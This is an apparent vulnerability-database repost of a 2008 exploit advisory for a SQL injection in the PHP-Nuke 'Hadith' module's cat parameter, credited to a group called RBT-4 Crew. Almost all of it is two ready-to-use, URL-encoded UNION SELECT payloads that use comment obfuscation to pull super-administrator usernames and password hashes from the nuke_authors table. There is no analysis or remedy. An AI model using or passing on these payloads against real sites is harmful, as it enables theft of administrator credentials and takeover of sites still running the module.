Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19367
HistoryMar 10, 2008 - 12:00 a.m.

PHP-Nuke SQL injection Module "Hadith" [cat]

2008-03-1000:00:00
vulners.com
77

R B T - 4 C R E W www.rbt-4.net


AUTHOR : Lovebug

PHP-Nuke Module "Hadith" [cat] Sql injection

Original Advisory:
http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3078

Exploit

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A